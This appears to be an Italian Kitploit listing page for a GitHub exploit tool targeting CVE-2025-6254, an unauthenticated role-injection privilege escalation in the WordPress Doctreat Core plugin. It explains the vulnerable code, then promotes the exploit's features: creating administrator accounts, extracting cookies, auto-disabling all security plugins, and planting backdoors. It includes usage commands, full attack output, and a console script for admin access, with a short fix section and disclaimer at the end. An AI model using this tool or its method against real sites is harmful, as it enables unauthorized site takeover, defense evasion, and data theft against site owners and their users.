Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-6254 — CVE-2025-6254 — Doctreat Core <= 1.6.8 — Escalation di Privilegi Non Autenticata | Kitploit
Strumenti/GitHubGitHub/yucaerin/cve-2025-6254
Escalation di PrivilegiGenerazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPost-ExploitSicurezza WebCTFPenetration TestingApprendimento e FormazioneRed Teaming
22 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
GitHub
yucaerin/cve-2025-6254

CVE-2025-6254

CVE-2025-6254 — Doctreat Core <= 1.6.8 — Escalation di Privilegi Non Autenticata

Vedi Repository

CVE-2025-6254 — Doctreat Core <= 1.6.8 — Escalatazione dei Privilegi non Autenticata tramite Iniezione di Ruolo

🔥 Riepilogo della Vulnerabilità

Il plugin WordPress Doctreat Core versioni <= 1.6.8 è vulnerabile a una vulnerabilità di escalation dei privilegi non autenticata. Questa grave falla consente ad attaccanti non autenticati di creare un nuovo account Amministratore direttamente tramite l'endpoint AJAX di registrazione del plugin.

La vulnerabilità deriva dalla funzione doctreat_process_registration() in hooks/hooks.php, che accetta il parametro user_type direttamente dai dati POST inviati dall'utente e lo passa come parametro role a wp_update_user() senza una corretta autorizzazione o convalida tramite whitelist. Il plugin applica solo esc_sql() (che non convalida i ruoli) — non verifica mai se il ruolo è sicuro per la registrazione pubblica.

Scoperta Rivoluzionaria: Il nonce utilizzato da Doctreat (scripts_vars.ajax_nonce) è esposto su qualsiasi pagina pubblica del tema Doctreat attivo. Il parametro user_type, che normalmente controlla se un utente si registra come "doctors", "hospitals" o "regular_users", può essere sovrascritto tramite POST con user_type=administrator — e questo valore viene passato direttamente come parametro role di WordPress.

🔍 Plugin Affetto

🧨 Cosa Possono Fare gli Attaccanti

🧪 Caratteristiche dell'Exploit

  • 🔓 Nessuna autenticazione richiesta
  • 📝 Funziona tramite endpoint AJAX di registrazione
  • 🎯 Prende di mira l'endpoint AJAX /wp-admin/admin-ajax.php?action=doctreat_process_registration
  • 🧠 Iniezione di ruolo — invia user_type=administrator insieme ai normali campi di registrazione
  • 🌐 Estrazione automatica del nonce — estrae ajax_nonce dalle pagine pubbliche del tema Doctreat
  • 🔐 Bypassa la verifica del nonce — utilizza il nonce legittimo esposto dagli script del tema
  • 🔗 Rilevamento automatico di http/https — non è necessario specificare il protocollo
  • 🔒 Supporto SSL non sicuro — funziona con certificati self-signed/non validi
  • 🎛️ Disattivazione automatica di tutti i plugin — 3 metodi: azione bulk plugins.php, REST API, admin-ajax.php
  • 🍪 Estrazione dei cookie — restituisce i cookie di autenticazione WordPress per uso browser/curl
  • 🧠 Script per console JavaScript — incollare negli strumenti di sviluppo del browser per accesso amministratore immediato

🧠 Codice Vulnerabile

root@kitploit:~
// doctreat_core/hooks/hooks.php ~ line 296
wp_update_user( array(
    'ID' => esc_sql( $user_identity ),
    'role' => esc_sql( $user_type ),  // ← user_type from $_POST via extract($_POST)
    'user_status' => 0
) );
root@kitploit:~
// ~ line 311 — Sets _is_verified after registration
update_user_meta( $user_identity, '_is_verified', 'no' );

Nota: Su target con impostazioni di verifica predefinite ($verify_user vuoto o 'remove'), l'utente viene automaticamente verificato e ottiene immediatamente accesso amministratore. Target con verifica via email o approvazione amministratore richiederanno passaggi di verifica aggiuntivi.

🚀 Utilizzo

root@kitploit:~
python3 CVE-2025-6254_exploit.py target.com
python3 CVE-2025-6254_exploit.py https://target.com
python3 CVE-2025-6254_exploit.py http://target.com:8080

Login con Credenziali Esistenti (Ottieni Cookie)

root@kitploit:~
python3 CVE-2025-6254_exploit.py target.com username password

Esempio di Output Completo

root@kitploit:~
============================================================
CVE-2025-6254 PoC - Doctreat Core Privilege Escalation
============================================================
[*] Target: https://target.com
[+] Found nonce from https://target.com/: abc123xyz
[*] Sending registration request...
[*] Username: hackeradmin1234
[*] Role: administrator

[+] EXPLOIT SUCCESSFUL!
[+] Username: hackeradmin1234
[+] Password: Password@1234!
[+] Email: [email protected]
[+] Role: ADMINISTRATOR

[*] Attempting to login and extract cookies...
[*] Trying Doctreat admin-ajax.php login...
[*] AJAX login status: 200
[*] AJAX login response: {"type":"success","loggedin":true,...}

[+] LOGIN SUCCESSFUL! AUTH COOKIES EXTRACTED!
[+] JAVASCRIPT CONSOLE SCRIPT (COPY & PASTE):
// Paste this in browser DevTools console for instant admin access

[*] PHASE 2: AUTO-DISABLE ALL PLUGINS (PYTHON)
[*] Fetching plugin list from: https://target.com/wp-admin/plugins.php
[+] Found nonce: def456uvw
[+] Found 15 active plugins
[*] Disabling all plugins via bulk action...
[+] ALL PLUGINS DISABLED SUCCESSFULLY!

Script per Console JavaScript

After running the exploit, copy the generated JavaScript and paste it in your browser's DevTools Console (F12):

root@kitploit:~
(function() {
    'use strict';
    console.log('[*] Starting WordPress admin access...');
    // ... cookies set automatically ...
    window.location.href = 'https://target.com/wp-admin/';
})();

Requisiti

  • Python 3.6+
  • Libreria requests (pip install requests)
  • Il target deve avere:
    • Tema Doctreat attivo (per estrazione nonce)
    • Plugin Doctreat Core <= 1.6.8 attivato
    • Registrazione utenti abilitata

🛠 Raccomandazioni per la Correzione

root@kitploit:~
// SECURE: Allowlist only safe roles for public registration
$allowed_roles = array('doctors', 'hospitals', 'regular_users', 'seller');
if (!in_array($user_type, $allowed_roles, true)) {
    $user_type = 'regular_users';  // ← Reject ALL dangerous roles
}
  • Implementare una whitelist rigorosa dei ruoli per la registrazione
  • Aggiungere controlli di capacità current_user_can('create_users') per i ruoli privilegiati
  • Convalidare user_type prima di passarlo a wp_update_user()
  • Considerare la rimozione dell'assegnazione del ruolo dalla registrazione pubblica

🧠 Ricercatore

  • Crediti: Friderika Baranyai (Foxyyy)

📚 Riferimenti

  • Avviso Wordfence

🔒 Disclaimer

Queste informazioni sono fornite solo a scopo educativo e di test di penetrazione autorizzato. Lo sfruttamento non autorizzato di sistemi informatici è illegale e non etico. Ottenere sempre un'autorizzazione scritta esplicita prima di testare qualsiasi target che non si possiede.

Scarica lo strumento
Nome PluginDoctreat Core
Versione Affetta<= 1.6.8
Tipo di VulnerabilitàEscalatazione dei Privilegi non Autenticata tramite Iniezione di Ruolo
ID CVECVE-2025-6254
Punteggio CVSS9.8 (Critico)
CWECWE-269 — Gestione Impropria dei Privilegi
ImpattoAcquisizione Completa del Sito — Creazione di Account Amministratore
CapacitàImpatto
🔑 Creare account amministratore senza loginAcquisizione Completa del Sito
🎛️ Disattivare automaticamente tutti i plugin di sicurezzaEvasione della Difesa
💉 Modificare file PHP di plugin/temaEsecuzione di Codice Remota
🕳️ Installare backdoor nascosteAccesso Persistente
👥 Visualizzare tutti i dati utenteViolazione della Privacy